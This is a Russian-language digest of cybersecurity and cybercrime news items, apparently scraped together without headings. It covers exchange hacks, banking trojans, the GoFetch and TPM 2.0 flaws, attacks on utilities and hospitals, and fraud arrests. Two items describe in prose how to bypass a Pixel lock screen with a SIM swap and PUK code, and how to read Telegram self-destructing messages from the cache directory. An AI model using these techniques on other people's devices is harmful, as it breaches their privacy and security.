Расследование началось в Жиронде, но офицеры расширили свои поиски до парижского региона. Предполагаемые мошенники, похоже, охотились на богатых жертв. Похоже, они были активны в Каннах и Межеве, альпийском горнолыжном курорте, который стал популярным среди миллиардеров.
source: francebleu.fr/infos/faits-divers-justice/bentley-bitcoins-et- montre-a-50000-les-escrocs-presumes-rattrapes-par-des-juges-bordelais-7918830
Централизованная криптобиржа XT [приостановила](https://xtsupport.zendesk.com/hc/en- us/articles/40522692897561-XT-has-suspended-all-coin-withdrawals) вывод средств из-за «технических работ и обновления кошелька». По данным PeckShieldAlert, площадка потеряла $1,7 млн в результате взлома.
__https://twitter.com/x/status/1862059885174874355
Согласно выводам блокчейн-аналитиков, злоумышленник обменял украденные криптоактивы на 461,58 ETH. Средства остаются на идентифицированном PeckShield адресе.
Команда пострадавшей биржи подтвердила информацию про «аномальную транзакцию» с кошелька платформы и заверила, что средства клиентов в безопасности — объем резервов в 1,5 раза превышает сумму пользовательских активов.
Кроме того, к середине декабря 2024 года разработчики пообещали внедрить систему Merkel Tree Asset Proof для повышения прозрачности.
XT — централизованная криптовалютная биржа, запущенная в 2018 году. На площадке представлено больше 1000 пар, а суточный объем торгов по версии CoinGecko составляет $3,35 млрд.
У владельцев MacBook проблемы: в процессорах M1 и M2 нашли серьёзную уязвимость GoFetch, которая позволяет перехватить зашифрованную информацию из кэша чипа и восстановить ключ шифрования. Всему виной DMP (Data Memory- dependent Prefetcher) — благодаря этой фиче процессор подгружает в кэш данные до того, как они понадобятся. Обычно это помогает ускорить быстродействие макбука, но оказалось, что с помощью GoFetch можно выгрузить через DMP в кэш конфиденциальные данные. Самое грустное, что проблему не пофиксить патчем — придется резать DMP, что сильно ударит про производительности.
По данным специалистов компании [Zimperium](https://www.zimperium.com/resources/zimperiums-2023-mobile- banking-heists-report-finds-29-malware-families-targeted-1800-banking-apps- across-61-countries-in-the-last-year/), в этом году появилось десять новых семейств банковских троянов для Android, которые в совокупности атаковали 985 банковских, финансовых и торговых приложений в 61 стране мира.
Исследователи рассказывают, что в дополнение к десяти новым троянам, запущенным в 2023 году, сразу 19 семейств малвари из 2022 года были модифицированы, получив новые возможности и став более сложными. Отмечается, что из всех семейств вредоносных программ, существовавших в 2022 году и обновленных в 2023 году, наиболее заметную активность проявляли Teabot, Exobot, Mysterybot, Medusa, Cabossous, Anubis и Coper.
В итоге эксперты проанализировала все 29 актуальных семейств вредоносов и сообщили, что среди новых тенденций можно выделить следующие:
Среди стандартных функций, доступных в большинстве исследованных банкеров, исследователи отмечают кейлоггеры, наложение фишинговых оверлеев и кражу SMS- сообщений.
Еще одним тревожным трендом этого года стало то, что банковские трояны все чаще не ограничиваются кражей только банковских учетных данных и денег, но теперь нацеливаются на социальные сети, мессенджеры и персональные данные жертв.
Что касается десяти новых семейств малвари, эксперты изучили более 2100 вариантов этих вредоносов, которые маскируются под специальные утилиты, приложения для повышения производительности, развлекательные порталы, инструменты для обработки фото, игры и учебные пособия. Новые трояны перечислены ниже:
[](https://xakep.ru/wp- content/uploads/2023/12/444939/overview.png)
Список наиболее атакуемых в этом году стран возглавили США (109 атакованных банковских приложений), за ними следуют Великобритания (48 банковских приложений), Италия (44 приложения), Австралия (34), Турция (32), Франция (30), Испания (29), Португалия (27), Германия (23) и Канада (17).
Власти Таиланда арестовали пятерых иностранных граждан по делу BCH Global Ltd.
Указанная компания попала в поле зрения ведомства в конце 2022 года. Организаторы схемы обещали вкладчикам высокую прибыль. Жертвы инвестировали не только криптоактивы, но и золото.
Приблизительное число пострадавших — 3280 человек. В CCIB отметили, что реальные цифры могут быть больше, поэтому всех, кто понес ущерб от действий BCH Global Ltd, просят обращаться в управление.
В рамках расследования власти задержали четырех граждан Китая и одного Лаоса. Им вменяют организацию преступной схемы, финансовое мошенничество и отмывание средств, полученных незаконным путем.
Ущерб от действий злоумышленников составляет 2,7 млрд бат (около $75,6 млн по курсу на момент написания). При задержании полиция конфисковала их активы на 585 млн бат ($16,4 млн).
По словам Фатаначароена, среди мошенничеств в финансовом секторе именно такие схемы причиняют наибольший ущерб. Некоторые люди закладывают дома и берут кредиты, чтобы вложить деньги в погоне за прибылью, подчеркнул он.
source: bangkokpost.com/thailand/general/2644790/cops-arrest-5-foreigners- over-links-to-b2-7bn-scam
Британские спецслужбы боятся потерять возможность эксплуатировать уязвимости в устройствах Apple.
Великобритания рассматривает радикальные меры в области кибербезопасности, которые могут включать в себя запрет на обновления безопасности для продуктов Apple.
Согласно новым планам, технологические компании, включая Apple, будут обязаны уведомлять британские власти перед выпуском любого обновления безопасности. В случае, если данное обновление устранит уязвимость, которую используют британские спецслужбы для слежки и сбора данных, власти могут запретить его выпуск.
Новая инициатива является продолжением кампании против сквозного шифрования (End to End Encryption, E2EE), начавшейся в 2017 году. Тогда бывший глава MI5 предупредил правительство о рисках такой политики, но его предостережения были проигнорированы.
Экс-руководитель MI5 заявил, что хотя шифрование усложняет работу спецслужб, оно необходимо для обеспечения безопасного пространства для пользователей и имеет стратегическую важность для экономической безопасности страны. Недавно Apple объявила , что может удалить свои сервисы iMessage и FaceTime из Великобритании, если власти настоят на отключении сквозного шифрования.
Ключевой момент новой инициативы заключается в том, что британское правительство может фактически запретить Apple выпускать обновления безопасности, если они мешают действиям спецслужб. Такое решение вызывает большую тревогу среди экспертов по кибербезопасности, так как уязвимости, открытые для нужд государства, могут быть эксплуатированы злоумышленниками.
Специалисты компании Just Security [подчеркивают](https://www.justsecurity.org/87615/changes-to-uk-surveillance- regime-may-violate-international-law/) , что даже если уязвимость обнаруживается исследователями безопасности, любая задержка в выпуске обновлений увеличивает риски для пользователей. Это особенно актуально, учитывая, что большинство уязвимостей становятся известными после их использования хакерами.
Профессионалы в области технологий высмеивают такие предложения, считая их технически неграмотными. Эксперты предупреждают, что подобные действия могут привести к массовым нарушениям безопасности и ущербу для пользователей на глобальном уровне.
В платформе Android [выявлена](https://bugs.xdavidhu.me/google/2022/11/10/accidental-70k-google- pixel-lock-screen-bypass/) уязвимость (CVE-2022-20465), позволяющая отключить блокировку экрана путём перестановки SIM-карты и ввода PUK-кода. Возможность отключения блокировки продемонстрирована на устройствах Google Pixel, но так как исправление затрагивает основную кодовую базу Android, вероятно, что проблема касается и прошивок от других производителей. Проблема устранена в ноябрьском наборе исправлений проблем с безопасностью для Android. Обративший внимание не проблему исследователь получил от компании Google вознаграждение, размером 70 тысяч долларов.
Проблема вызвана неверной обработкой разблокировки после введения PUK-кода (Personal Unblocking Key), применяемого для возобновления работы SIM-карты, заблокированной после многократного неверного введения PIN-кода. Для отключения блокировки экрана достаточно установить в телефон свою SIM-карту, в которой выставлена защита на основе PIN-кода. После смены SIM-карты, защищённой PIN-кодом, на экран вначале выводится запрос PIN-кода. Если три раза неверно ввести PIN-код, произойдёт блокировка SIM-карты, после чего для разблокировки будет предоставлена возможность ввести PUK-код. Оказалось, что верный ввод PUK-кода не только разблокирует SIM-карту, но приводит к переходу в основной интерфейс в обход хранителя экрана, без подтверждения доступа при помощи основного пароля или графического ключа.
Уязвимость вызвана ошибкой в логике проверки PUK-кодов в обработчике KeyguardSimPukViewController, отвечающем за отображение дополнительного экрана аутентификации. В Android используется несколько типов экранов аутентификации (для PIN, PUK, пароля, графического ключа, биометрической аутентификации) и эти экраны вызываются последовательно, когда требуется выполнение нескольких проверок, например, когда требуется PIN и графический ключ.
При верном вводе PIN-кода срабатывает вторая стадия проверки, требующая ввода основного кода разблокировки, но при вводе PUK-кода подобная стадия пропускается и доступ предоставляется без запроса основного пароля или графического ключа. Отбрасывание следующего этапа разблокировки производится так как при вызове KeyguardSecurityContainerController#dismiss() не производится сравнение ожидаемого и пройденного метода проверки, т.е. обработчик считает, что смены метода проверки не произошло и завершение проверки PUK-кода свидетельствует об успешном подтверждении полномочий.
Уязвимость была выявлена случайно - у пользователя разрядился телефон и после зарядки и включения он несколько раз ошибся при вводе PIN-кода, после чего снял блокировку PUN-кодом и удивился, что система не запросила основной пароль, используемый для расшифровки данных, после чего зависла с сообщением "Pixel is starting…". Пользователь оказался дотошным, решил разобраться в чём дело и стал разными способами экспериментировать с вводом PIN- и PUK-кодов, пока случайно не забыл перезагрузить устройство после смены SIM-карты и не получил вместо зависания доступ к окружению.
Особый интерес представляет реакция Google на сообщение об уязвимости. Информация о проблеме была отправлена в июне, но до сентября исследователь так и не смог добиться вразумительного ответа. Он посчитал, что подобное поведение объясняется тем, что он не первый, кто сообщил о данной ошибке. Подозрения, что что-то идёт не так возникли в сентябре, когда проблема осталась неисправленной после установки обновления прошивки, впущенного спустя 90 дней, когда уже истёк заявленный период неразглашения.
Так как все попытки узнать состояние отправленного сообщения о проблеме приводили лишь к автоматизированным и шаблонным отпискам, исследователь попытался связаться лично с работниками Google для выяснения ситуации с подготовкой исправления и даже продемонстрировал уязвимость в лондонском офисе Google. Лишь после этого работа по устранению уязвимости сдвинулась с мёртвой точки. В ходе разбора оказалось, что о проблеме уже кто-то сообщал ранее, но Google решил сделать исключение и выплатить вознаграждение за повторное сообщение о проблеме, так как только благодаря настойчивости его автора на проблему обратили внимание.
• Video:
Уполномоченный по правам человека в РФ Татьяна Москалькова сообщила о возвращении Олега Никитина на родину из заключения в тюрьме США, а также поблагодарила компетентные службы за содействие.
Омбудсмен рассказала, что в 2019 году к ней на личный прием пришли жена и сын Никитина, арестованного в США в сентябре 2019 года и абсурдно обвиненного американскими властями в целом ряде преступлений — отмывании денег, шпионаже, попытке обойти антироссийские санкции и так далее. Москалькова подчеркнула, что ни бизнесмен, ни его компания, которая специализировалась на реконструкции сахарных заводов, не входили в санкционные списки США. Родственники на приеме рассказали об изощренных методах американского следствия и ужасных условиях, в которых находился Никитин.
«Изнанка американского правосудия оказалась совсем несахарной и не похожей на ботоксный глянец голливудских фильмов: нормой был шантаж и заключение в карцер, постоянное психологическое давление и запугивание. Ну, очень хотелось американским пинкертонам сломать «этого русского». Конечно, остаться равнодушными к этой вопиющей ситуации было невозможно. Я обращалась в защиту Никитина с многочисленными ходатайствами, заявлениями, просьбами в различные международные органы, демонстрируя международному правозащитному сообществу безжалостный и политически мотивированный механизм жерновов американского правосудия», - рассказала Москалькова.
Во вторник рейс доставил Никитина на родину.
«Олег вместе со своей семьей, любовь и верность которой придавала ему силы в американской тюрьме. Огромная роль в осуществлении заветной мечты семьи Никитиных принадлежит МИД России и российским спецслужбам. Благодарю российские компетентные органы за блестящую работу. Россия своих не бросает!»,- заключила федеральный омбудсмен.
Правоохранительные органы Италии арестовали в северном городе Генуя 40-летнюю россиянку, которой предъявлены обвинения в кибермошенничестве, сообщила в понедельник миланская газета Corriere della Sera.
Согласно этой информации, женщину подозревают в принадлежности к некой транснациональной организации, занимающейся кибермошенничеством. Речь идет, прежде всего, о покупке на интернет-порталах различных дорогостоящих товаров с использованием кредитных карт и банковских счетов ничего не подозревавших граждан.
По данным следственных органов, россиянка, которая уже долгое время проживает в Генуе, получала заказанные мошенническим путем товары, используя поддельные документы, или поручала сделать это за плату другим лицам. Таким образом она становилась обладательницей новейших смартфонов и других дорогостоящих электронных товаров, которые затем отправлялись в Россию другим членам преступной организации или продавались через интернет. На полученные таким образом деньги закупалась криптовалюта.
Как сообщает Corriere della Sera, при аресте женщины сотрудники спецподразделения Почтовой полиции Италии по киберпреступности обнаружили у нее дома "сотни кредитных карт, специально активированных для отмывания доходов, полученных в результате мошеннических действий".
• Source: [https://www.corriere.it/cronache/21...ia-0cd96f66-2a54-11ec-94aa-f0ac72755abe.shtml](https://www.corriere.it/cronache/21_ottobre_11/genova- arrestata-frode-informatica-40enne-russa-sembrava-tranquilla-madre- famiglia-0cd96f66-2a54-11ec-94aa-f0ac72755abe.shtml)
• Video: https://www.ilmessaggero.it/video/cronaca/hacker_russa_arrestata_frodi_genova-6249810.html
Специалист Trustwave SpiderLabs Риган Ричард Джайапол (Reegun Richard Jayapaul) обнаружил способ, позволяющий пользователям Telegram для Mac навсегда сохранять самоуничтожающиеся сообщения и просматривать их без ведома отправителя.
Для обеспечения большей конфиденциальности пользователей в мессенджере Telegram предусмотрена возможность создавать закрытые беседы с дополнительными функциями приватности. Когда пользователь общается в закрытом чате с другим пользователем, трафик между ними защищен с помощью сквозного шифрования, а все сообщения, вложения и медиафайлы становятся самоуничтожающимися и через некоторое время удаляются со всех устройств автоматически. Однако обнаруженная Джайаполом уязвимость позволяет сохранять эти сообщения и вложения.
Отправляемые в закрытой беседе медиафайлы и другие вложения сохраняются в папке кэша, находящейся в директории /Users/Admin/Library/Group Containers/XXXXXXX.ru.keepcoder.Telegram/appstore/account-1271742300XXXXXX/postbox/media, где XXXXXX – уникальный номер учетной записи.
Telegram не загружает вложенные в сообщение файлы (текстовые документы text, doc, и pdf, аудио- и видеофайлы), пока получатель не попытается их открыть. Скорее всего, это связано с большим размером документов.
Когда получатель читает сообщение или просматривает вложения, запускается таймер самоуничтожения, и когда пользователь перестает читать, контент автоматически удаляется. Тем не менее, Джайапол обнаружил, что самоуничтожающиеся файлы не удаляются из папки кэша, и пользователи могут сохранить их оттуда в любое место на жестком диске.
Исследователь в надлежащем порядке уведомил Telegram об уязвимости, и она была исправлена в версии Telegram для macOS 7.7 (215786) и более поздних. Однако есть еще один баг, позволяющий сохранять самоуничтожающиеся сообщения.
Когда голосовые и видеосообщения, изображения или геолокация автоматически загружаются в кэш, пользователь может просто скопировать их из папки кэша до того, как откроет в самом Telegram. Кроме того, получатель может прочитать сообщение в кэше, не открывая в мессенджере. В таком случае отправитель не будет знать, что пользователь уже прочитал сообщение.
Как сообщили представители Telegram, вторую уязвимость исправить невозможно, поскольку нет никакой возможности защитить папку приложения от непосредственного доступа. Однако исследователь не согласен с этим. По его мнению, Telegram может исправить ошибку, обрабатывая все самоуничтожающиеся медиа так же, как вложения, и не загружать их в локальную файловую систему, пока они не будут открыты.
Злоумышленники установили в сетях предприятий web-оболочку для удаленного доступа к ним.
ФБР США проводит расследование кибератак на две системы водоснабжения в штате Пенсильвания.
В прошлом месяце местная организация Water Action Response Network, в которую входят коммунальные предприятия, сообщила своим членам в электронной рассылке о том, что две системы водоснабжения подверглись «кибервторжению». Согласно письму, хакеры установили в сетях предприятий web-оболочку для удаленного доступа к ним. Атака была обнаружена и остановлена, и ФБР инициировало расследование. Названия предприятий организация не сообщила.
«Это настораживает, и это очень уязвимое дело», - отметил Гай Круппа (Guy Kruppa), являющийся инспектором системы водоснабжения округа Бель Вернон (штат Пенсильвания), которая обслуживает около 2,3 тыс. домов и компаний.
В обязанности Круппы входит компьютерный мониторинг уровней хлора и PH водопроводной воды. По его словам, он постоянно беспокоится о том, что злоумышленники получат доступ к системе и изменят уровни химических веществ.
«Если вы добавите больше хлора, больше фосфатов, это может привести к дикой ситуации, когда придется слить все резервуары. Людям станет плохо. Это может превратиться в настоящий кошмар», - приводит слова Круппы пенсильванский телеканал 6abc.
Подобное чуть не случилось ранее в этом году в городе Олдсмар, штат Флорида. Злоумышленник получил доступ к системе очистки воды и повысил уровень гидроксида натрия (очищающего химического вещества) до опасных показателей. К счастью, сотрудникам водоочистной станции удалось вовремя снизить концентрацию опасного вещества.
После случившегося в Олдсмаре Комиссия по коммунальному хозяйству представила предприятиям штата советы по усилению кибербезопасности. Согласно требованиям комиссии, крупные коммунальные предприятия должны составлять годовые планы по обеспечению кибербезопасности, но от небольших муниципальных систем этого не требуется, поэтому они более уязвимы к хакерским атакам.
К мировым лидерам присоединяется неожиданный участник, который поворачивает игру в свою пользу.
Принято считать, что киберпространство — это сфера влияния технологических супердержав, таких как США, Китай и Россия, которые обладают мощными и продвинутыми возможностями. Чуть ниже в рейтингах располагаются страны с высоким технологическим потенциалом, например Великобритания, Австралия, Южная Корея и Иран.
На фоне этих стран африканские государства традиционно считаются менее значимыми в геополитике цифрового пространства. Внешние комментарии зачастую фокусируются на их технической уязвимости и зависимости от технологий Востока и Запада. Кроме того, внутри самих стран континента часто поднимается вопрос «цифрового колониализма» из-за применения технологий, которые разрабатываются и контролируются другими государствами.
Однако подобные оценки могут оказаться неточными. Недавнее исследование доказывает, что даже государства, не обладающие значительными наступательными кибервозможностями, могут влиять на супердержавы в цифровом мире.
Влияние африканских элит в киберпространстве
ИТ-технологии относительно дешевые и быстро распространяются, что позволяет менее развитым странам эффективно противодействовать сильным игрокам. Доступные инструменты варьируются от базовых комплектов программ-вымогателей за $375 до аренды кастомизированных наборов за десятки и сотни тысяч долларов в год. Некоторые из самых сложных решений, вроде шпионского ПО Pegasus, сдавались в аренду за $7-8 млн в год.
Сравнительно низкая стоимость позволяет африканским странам и элитам применять стратегию «диверсификации партнеров», выбирая различные внешние силы для достижения своих политических целей. В определенных случаях страны Африки напрямую приобретают необходимые технологии, а в других — находят партнеров, которые используют эти инструменты в интересах Африки.
Примеры включают попытки Китая шпионить за штаб-квартирой Африканского союза в Эфиопии и информационные кампании во время Второй гражданской войны в Ливии. Несмотря на значительное влияние Китая в киберпространстве, африканским лидерам удается избегать или даже использовать возможности других стран в свою пользу.
Китай, Эфиопия и Африканский союз
В течение двух десятилетий Китай являлся главным поставщиком цифровой инфраструктуры и технологий наблюдения для Эфиопии. Китай инвестировал в строительство штаб-квартиры Африканского союза (АС) в Аддис-Абебе, что привело к крупномасштабному кибершпионажу. Через сети и установленные камеры Китай с 2012 года собирал разведданные на базе.
Однако сотрудничество с Китаем обусловлено доступностью технологий и разногласиями с требованиями Запада по приватизации инфраструктуры, не соответствующими интересам Эфиопии. Более того, отношения с Китаем не помешали Эфиопии привлекать других партнеров, включая Израиль, США и Италию, для развития способностей в киберпространстве и диверсификации технологических поставок.
Благодаря такому разнообразию партнеров и возможностям Эфиопия смогла отчасти противостоять шпионажу Китая. Например, специалисты по сетям АС обнаружили проникновение и, работая с экспертами из Эфиопии и Алжира, создали независимую безопасную ИТ-инфраструктуру. Кроме того, специалисты японской CERT помогли выявить кражу данных с камер видеонаблюдения китайской хакерской группой Bronze President.
Эффективность применения кибервозможностей
Действия Китая, несомненно, влияют на киберпространство Африки. Однако транзакции в сфере кибербезопасности редко бывают односторонними, а слабые в киберсфере государства часто находят способы минимизировать влияние супердержав и развивать собственные интересы.
Суть заключается в том, что киберпространство является сферой, где преимущества получают те, кто наиболее эффективно применяет имеющиеся возможности, а не те, кто их изобретает. И в этой игре африканские страны могут эффективно защищать свои интересы, несмотря на технологическое неравенство.
journals.sagepub.com/doi/abs/10.1177/0306396818823172
tandfonline.com/doi/full/10.1080/01402390.2024.2330074
academic.oup.com/afraf/article/119/477/633/5851108
reuters.com/world/china/exclusive-suspected-chinese-hackers-stole-camera-
footage-african-union-memo-2020-12-16/
Разработка и внедрение разведывательных систем в Израиле
• Израиль разработал шесть новых систем для мониторинга социальных сетей в
ответ на войну в Газе.
• Системы направлены на поддержку публичной дипломатии, борьбу с
антисемитизмом и сбор разведданных.
• До войны в Газе у Израиля не было необходимых технологий для мониторинга
социальных сетей.
Проблемы и вызовы в области разведки в социальных сетях
• Израиль сталкивается с трудностями в отслеживании неаутентичной активности и
поддельных аккаунтов.
• Создание поддельных аккаунтов и их использование для дезинформации стало
проще благодаря развитию искусственного интеллекта.
• Израильские компании сталкиваются с нехваткой финансирования и отсутствием
государственной поддержки.
Примеры успешных и неудачных инициатив
• XPOS разработала систему SOCMINT для правоохранительных органов и
разведывательных служб, которая помогла удалить тысячи поддельных аккаунтов.
• Brinker, новая аналитическая компания, выявляет кампании против частных и
гражданских клиентов.
• *Facebook ограничивает доступ к данным, что усложняет мониторинг и наносит
удар по индустрии аналитических центров.
Перспективы и вызовы в области борьбы с дезинформацией
• Ожидается, что рынок средств борьбы с дезинформацией будет расти, и частные
организации сталкиваются с аналогичными проблемами.
• Некоторые инициативы, такие как Digital Dome, были прекращены из-за высоких
операционных расходов и рисков.
• Большинство инициатив сосредоточены на открытой информации, а не на
использовании аватаров для доступа к данным.
Инвестиции в социальные сети
• В 2017 и 2018 годах Израиль инвестировал значительные средства в системы
мониторинга социальных сетей.
• Системы мониторинга были разработаны для борьбы с антиизраильскими
высказываниями и движением бойкота.
Проблемы с системами мониторинга
• Министерство по делам диаспоры инвестировало в три системы мониторинга, но
одна из них была отменена из-за дефектов.
• После войны Израиль заключил контракт с Terrogence на создание новой системы
мониторинга.
• Все системы оказались неэффективными в сборе информации во время конфликта.
Нецелевое использование средств
• Министерство по делам диаспоры заплатило за исследования, связанные с
Telegram, что вызвало вопросы о нецелевом расходовании средств.
• Управление государственного контролера изучает использование собранных
данных и выражает опасения по поводу нецелевого расходования средств.
Реакция Министерства по делам диаспоры
• Министерство заявило, что тщательно отбирало проекты для поддержки во время
войны, уделяя особое внимание инновационным инициативам.
• Выплата Abu Ali Express была специальным контрактом, а не пилотной
программой.
*Facebook, *Instagram входят в Meta – организацию, признанную экстремистской и запрещенной на территории РФ
В Замбии разразился скандал с интернет-мошенничеством, в котором оказались замешаны граждане Китая. На этой неделе 22 китайца признали свою вину в киберпреступлениях, совершенных в рамках «изощренного мошеннического синдиката» в интернете.
Они входили в группу из 77 человек, задержанных в апреле после рейда на фирму Golden Top Support Services. Как выяснилось, эта компания вводила в заблуждение местных жителей, принимая их на работу якобы в колл-центр, но на самом деле заставляя участвовать в мошеннических телефонных обзвонах в пригороде столицы Лусаки.
«Организаторы этой схемы нанимали молодых замбийцев, преимущественно выпускников школ, выдавая их за операторов колл-центра. Ребята вели переговоры с ничего не подозревающими абонентами через WhatsApp, Telegram, чат-румы и другие платформы», — заявил после рейда генеральный директор Комиссии по борьбе с наркотиками Замбии Насон Банда.
Сотрудников фирмы отпустили под залог. А у преступников изъяли 13 тысяч SIM- карт и так называемые SIM-боксы — устройства, маскирующие международные звонки под местные. По данным Банды, незаконная деятельность группировки выходила за пределы Замбии — жертвами также становились граждане Сингапура, Перу, ОАЭ и других стран Африки. В чем именно заключалась суть преступной схемы правоохранители не раскрыли.
По данным BBC, китайцы признали свою вину в компьютерном мошенничестве, преступлениях с личными данными и незаконной эксплуатации компьютерных сетей. Приговор им будет вынесен в ближайшую пятницу.
Месяц назад Киберкомандование США заявило, что провело в Замбии первую «опережающую кибероперацию» по поимке преступников и предотвращению атак. Правоохранители на протяжении трех месяцев работали вместе с замбийскими IT- специалистами, выявляя уязвимости в компьютерных сетях и следы вредоносной деятельности.
bbc.com/news/articles/c999dyxenx0o
cybercom.mil/Media/News/Article/3522801/building-resilience-us-returns-from-
second-defensive-hunt-operation-in-
lithuania/#:~ext=CNMF%20has%20deployed%2050%20times,and%20other%20nations%20since%202
018.
Недавнее исчерпывающее исследование, проведённое специалистами компании Check Point, проливает свет на тёмную сторону киберпространства, раскрывая деятельность и личности злоумышленников, использующих вредоносное ПО Agent Tesla.
Agent Tesla — это продвинутый троян для удалённого доступа (RAT), специализирующийся на краже и проникновении конфиденциальной информации с заражённых машин. Недавно была обнаружена кампания этого вредоносного ПО, нацеленная на организации в США и Австралии, начавшаяся 7 ноября 2023 года. За кампанией стоят два киберпреступника, известных под псевдонимами «Bignosa» и «Gods», использующие фишинговые кампании для распространения вредоносного ПО.
При помощи спам-рассылок с приманками в виде бизнес-предложений злоумышленники распространяли Agent Tesla, замаскированный под невинные вложения. В ходе расследования экспертам Check Point удалось отследить активность этих злоумышленников и определить, что основной из них, «Bignosa», является частью группы, занимающейся вредоносными кампаниями и фишингом, причём основная масса серверов, используемых для распространения Agent Tesla, находится под контролем именно этой группы.
Особое внимание в отчёте Check Point было уделено инструменту Cassandra Protector, который использовался для маскировки вредоносного кода и его преобразования в ISO-образы, увеличивая таким образом шансы на успешное заражение целевых машин. Этот инструмент обладает функциями обхода антивируса, эмуляции, а также может прописывать себя в планировщик задач Windows для обеспечения постоянства.
Тщательный анализ связанной с «Bignosa» и «Gods» информации, включающей IP- адреса, почтовые адреса, телефонные номера, криптотранзакции, профили в Jabber, Skype, LinkedIn и Instagram*, так или иначе мелькающих в Сети, помогли исследователям раскрыть реальные личности злоумышленников.
Первый, «Bignosa», оказался жителем Кении по имени Носахаре Годсон, имеющим обширную историю использования Agent Tesla и проведения фишинговых атак. Второй, Кингсли Фредрик, известный под псевдонимами «Gods» и «Kmarshal», имеет нигерийское происхождение, однако учился в турецком университете. Хакер был связан с фишинговыми и вредоносными кампаниями начиная с марта 2023 года. Страна его текущего местонахождения доподлинно неизвестна.
Изначально специалисты рассматривали сотрудничество между хакерами исключительно в форме ролевой модели «ученик-наставник», так как «Gods» довольно часто помогал «Bignosa» в настройке экземпляров Agent Tesla, а также в удалении остатков заражения с компьютера после непреднамеренного запуска. Тем не менее, более поздние результаты исследования свидетельствуют о более тесном сотрудничестве между хакерами — они действовали как единая группа.
Таким образом, многочисленные следы, оставленные киберпреступниками в сети, позволили исследователям раскрыть их личности, воссоздать их действия, а также заглянуть в их повседневную деятельность. Как оказалось, даже крошечные и неважные фрагменты данных могут подвести итог в общей картине и раскрыть правду, которую злоумышленники предпочли бы скрыть.
Подробные карты цифровых следов для обоих хакеров
Специалисты Check Point заявляют, что тесно сотрудничали с правоохранительными органами при проведении своего расследования, поэтому можно с уверенностью сказать, что это лишь дело времени, когда киберпреступникам выдвинут официальные обвинения, найдут и арестуют.
Это исследование подчёркивает важность бдительности в сфере кибербезопасности и демонстрирует, как тщательный анализ цифровых следов может помочь в идентификации угроз.
Что же касательно Agent Tesla, для минимизации рисков заражения этим и подобным вредоносным ПО рекомендуется своевременно обновлять операционные системы и приложения, быть осторожными с неожиданными электронными письмами и усиливать свою осведомлённость о киберугрозах.
Как сообщается, Check Point продолжит активно мониторить деятельность киберпреступников и сотрудничать с правоохранительными органами для предотвращения будущих атак.
• Source: <https://research.checkpoint.com/2024/agent-tesla-targeting-united- states-and-australia/>
[Кибератака нарушила работу](https://abcnews.go.com/Health/wireStory/cyberattack-disrupted- hospitals-health-care-states-102017847) компьютерных систем больниц в нескольких штатах, что вынудило закрыть некоторые отделения неотложной помощи и перенаправить машины скорой помощи, а многие службы первичной медико- санитарной помощи в пятницу оставались закрытыми, поскольку эксперты по безопасности работали над определением масштабов проблемы и ее решением.
«Инцидент с безопасностью данных» начался в четверг в учреждениях, управляемых Prospect Medical Holdings, которая базируется в Калифорнии и имеет больницы и клиники там, а также в Техасе, Коннектикуте, Род-Айленде и Пенсильвании.
«Узнав об этом, мы отключили наши системы, чтобы защитить их, и начали расследование с помощью сторонних специалистов по кибербезопасности», — говорится в заявлении компании в пятницу. «Пока наше расследование продолжается, мы сосредоточены на удовлетворении насущных потребностей наших пациентов, поскольку мы усердно работаем, чтобы как можно быстрее вернуться к нормальной работе».
В Коннектикуте отделения неотложной помощи в Manchester Memorial и Rockville General были закрыты на большую часть четверга, а пациентов перенаправили в другие близлежащие медицинские центры.
«У нас есть национальная команда Prospect, которая работает и оценивает влияние атаки на все организации», — говорится в заявлении главного операционного директора сети здравоохранения Восточного Коннектикута Джиллиан Менцель.
Плановые операции, амбулаторные приемы, заборы крови и другие услуги были приостановлены, и хотя отделения неотложной помощи вновь открылись поздно вечером в четверг, многие службы первичной медико-санитарной помощи были закрыты в пятницу, согласно Eastern Connecticut Health Network, которая управляет учреждениями. С пациентами связывались индивидуально, сообщается на сайте сети.
Аналогичные сбои также были зарегистрированы на других объектах по всей системе.
«Waterbury Hospital соблюдает процедуры простоя, включая использование бумажных записей, до тех пор, пока ситуация не будет решена», — заявила пресс- секретарь Лауреша Хихани. «Мы тесно сотрудничаем с экспертами по ИТ- безопасности, чтобы решить эту проблему как можно быстрее».
По данным Philadelphia Inquirer, в Пенсильвании атака затронула службы в таких учреждениях, как Crozer-Chester Medical Center в Upland, Taylor Hospital в Ridley Park, Delaware County Memorial Hospital в Drexel Hill and Springfield Hospital в Springfiel.
___________________________________________________________________________________________________________________________________________________________________________________
Нехило так ударили... но блин, по больницам? Я думала это уже устаревший вариант по больницам бить.
Американец индийского происхождения Чираг Патель (Chirag Patel) приговорен к 51 месяцу тюремного заключения за взлом компьютеров и кражу данных кредитных карточек. Как отмечает India West, житель Норфолка (штат Вирджиния) с августа 2017 года по июль 2020-го неоднократно взламывал сеть международной гостиничной компании в Фениксе (штат Аризона).
Патель, по данным следствия, ставил перед собой сразу две задачи. Во-первых, он переводил и обналичивал на свое имя бонусные баллы, которые годами копили клиенты компании. Во-вторых, взломщик воровал номера кредитных карточек участников программы лояльности, а также другие их данные.
При этом Патель не постеснялся хранить скриншоты с персональными сведениями о клиентах компании в своем облаке в Google. За три года его добычей стали около 1,2 тысячи карточек. Некоторые из них позднее применялись для совершения несанкционированных покупок, другие он пытался продавать в даркнете.
Помимо четырех лет и трех месяцев заключения, Пателя ждут три года условного срока после отбывания реального, а также штраф в размере около 87,5 тысячи долларов, которые помечены как реституция.
source: indiawest.com/hacker-gets-51-months-for-computer-fraud
В коде с [эталонной реализацией](https://trustedcomputinggroup.org/wp- content/uploads/TCG_TPM2_r1p59_Part4_SuppRoutines_code_pub.pdf) спецификации TPM 2.0 (Trusted Platform Module) выявлены [уязвимости](https://trustedcomputinggroup.org/wp- content/uploads/TCGVRT0007-Advisory-FINAL.pdf) (CVE-2023-1017, CVE-2023-1018), приводящие к записи или чтению данных за границей выделенного буфера. Атака на реализации криптопроцессоров, использующих уязвимый код, может привести к извлечению или перезаписи хранящейся на стороне чипа информации, такой как криптографические ключи. Возможность перезаписи данных в прошивке TPM может быть использована атакующим для организации выполнения своего кода в контексте TPM, что, например, может быть использовано для реализации бэкдоров, работающих на стороне TPM и не определяемых из операционной системы.
